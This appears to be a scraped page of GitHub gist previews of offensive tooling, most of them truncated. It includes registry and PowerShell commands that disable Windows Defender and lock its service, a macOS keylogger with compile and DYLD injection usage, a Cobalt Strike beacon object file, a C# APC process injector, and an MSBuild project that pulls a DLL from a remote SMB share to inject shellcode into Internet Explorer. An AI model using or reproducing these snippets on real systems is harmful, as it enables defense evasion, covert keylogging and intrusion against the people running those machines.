:: Turn Off Windows Defender
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
:: Cloud-protection level
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Info: | |
// Universal macOS keylogger that tracks input locations. It's injected per app as it doesn't require having global keyboard capturing permission | |
// Compilation: | |
// gcc -dynamiclib /tmp/keylogger.m -o /tmp/keylogger.dylib -framework Foundation -framework Appkit -arch x86_64 -arch arm64 | |
// Usage: | |
// DYLD_INSERT_LIBRARIES=/tmp/keylogger.dylib /path/to/app/Contents/MacOS/App | |
#import <Foundation/Foundation.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
================================================================================ | |
modified from this: https://github.com/its-a-feature/macos_execute_from_memory (supports only bundle) | |
code injection : https://github.com/CylanceVulnResearch/osx_runbin by Stephanie Archibald (does not support m1 x64 emulation and FAT header) | |
added FAT header (universal Macho) parsing | |
script-kiddied, debugged, etc. by @exploitpreacher | |
================================================================================ | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import re | |
from urllib.parse import unquote | |
FLAGS = re.IGNORECASE | re.DOTALL | |
ESC_DOLLAR = r'(?:\$|[\\%]u0024||\\x24|\\0?44|%24)' | |
ESC_LCURLY = r'(?:\{|[\\%]u007B|\\x7B|\\173|%7B)' | |
ESC_RCURLY = r'(?:\}|[\\%]u007D|\\x7D|\\175|%7D)' | |
_U_PERCENT_ESCAPE_RE = re.compile(r'%(u[0-9a-f]{4})', flags=FLAGS) | |
_PERCENT_ESCAPE_RE = re.compile(r'%[0-9a-f]{2}', flags=FLAGS) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/_windows/default.aspx?ReturnUrl=/ | |
/abs | |
/abs/ | |
/adfs/ls | |
/adfs/ls/wia | |
/adfs/services/trust/13/windows | |
/adfs/services/trust/13/windowsmixed | |
/adfs/services/trust/13/windowstransport | |
/adfs/services/trust/2005/windows | |
/adfs/services/trust/2005/windowsmixed |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
================================================================================ | |
modified from this: https://github.com/its-a-feature/macos_execute_from_memory (supports only bundle) | |
code injection : https://github.com/CylanceVulnResearch/osx_runbin by Stephanie Archibald (does not support m1 x64 emulation and FAT header) | |
added FAT header (universal Macho) parsing | |
script-kiddied, debugged, etc. by @exploitpreacher | |
================================================================================ | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <string.h> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <psapi.h> | |
#include "beacon.h" | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
namespace DinjectorWithQUserAPC | |
{ | |
public class Program |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() | |
$user = 'NT SERVICE\TrustedInstaller' | |
$folder = $svc.GetFolder('\') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="MyTarget"> | |
<SimpleTask MyProperty="My voice is my passport." | |
MyCode='<base64 encoded x64 shellcode>' | |
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/> | |
</Target> | |
<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" /> | |
</Project> | |
NewerOlder